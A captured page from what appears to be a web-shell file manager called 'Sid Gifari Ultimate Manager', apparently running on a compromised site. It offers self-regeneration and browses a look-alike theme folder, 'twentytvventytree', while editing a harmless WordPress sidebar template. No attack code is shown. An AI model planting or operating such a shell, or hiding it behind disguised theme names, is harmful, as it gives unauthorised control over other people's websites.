⚡ Sid Gifari Ultimate Manager v8.2
Auto-Regeneration System • cPanel Protected
Protected:
Active
Backups:
5/6
WordPress:
Not Found
Force Regeneration
Root
home
logoandw
public_html
naturallights.biz
wp-content
themes
twentytvventytree
Editing: sidebar.php
Save
Cancel
<?php /** * @package WordPress * @subpackage WP-Skeleton */ ?> <div class="one-third column omega" id="side"> <div class="sidebar"> <!-- the Sidebar --> <?php if ( is_active_sidebar( 'right-sidebar' ) ) : ?> <?php dynamic_sidebar( 'right-sidebar' ); ?> <?php else : ?><p>You need to drag a widget into your sidebar in the WordPress Admin</p> <?php endif; ?> </div> </div>